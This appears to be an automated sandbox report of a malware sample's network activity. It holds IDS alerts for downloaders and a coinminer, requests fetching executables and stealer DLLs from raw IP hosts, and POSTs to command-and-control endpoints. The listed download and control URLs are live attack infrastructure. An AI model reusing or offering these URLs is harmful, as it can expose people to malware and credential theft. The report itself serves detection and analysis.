Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49786 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49787 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49789 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 76.76.21.142:443
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49785 -> 95.179.241.203:443
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=JucIrCz8M4V0Z1zjTRa.FFlYqlA1e5ENGA_.qLcWJ.Y-1725603466-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=UUOFWhuuwYuY.kabjHj7o96D61lAGsStIibOP.iArD8-1725603468-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=U4NEU7shPFIMhhw4GXtqwXZamOhdW4NoBG..0Z6q_yc-1725603480-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=PH3t8AxI4YISlQ0ButgKSks67MRVVjpRqnzxmV0xuDQ-1725603511-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.143.223.148
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 185.143.223.148
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 185.143.223.148
Source: global traffic HTTP traffic detected: HEAD /ssl/install.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /vjgg.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /sgnr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d897ad1752a_File.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vjgg.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sgnr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ssl/install.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d897ad1752a_File.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0050B480 InternetOpenUrlA,InternetReadFile,InternetCloseHandle, 2_2_0050B480
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: file-link-iota.vercel.app Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cache-Control: no-cache Host: youtransfer.net Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: iplogger.org
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1 Host: smkn2sumbawabesar.sch.id Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache Cookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.143.223.148
Source: global traffic HTTP traffic detected: GET /vjgg.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 46.29.235.52 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sgnr.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 46.29.235.52 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 31.41.244.9 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ssl/install.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.113.115.33 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d897ad1752a_File.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vjgg.exe HTTP/1.1 Host: 46.29.235.52 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lnef.exe HTTP/1.1 Host: 46.29.235.52 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 147.45.126.10 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1 Host: 147.45.126.10 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: 240902180529931.tyr.zont16.com
Source: global traffic DNS traffic detected: DNS query: file-link-iota.vercel.app
Source: global traffic DNS traffic detected: DNS query: youtransfer.net
Source: global traffic DNS traffic detected: DNS query: iplogger.org
Source: global traffic DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic DNS traffic detected: DNS query: t.me
Source: unknown HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Fri, 06 Sep 2024 06:17:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 17268 Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscryptoH
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exellg
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exerZ
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe
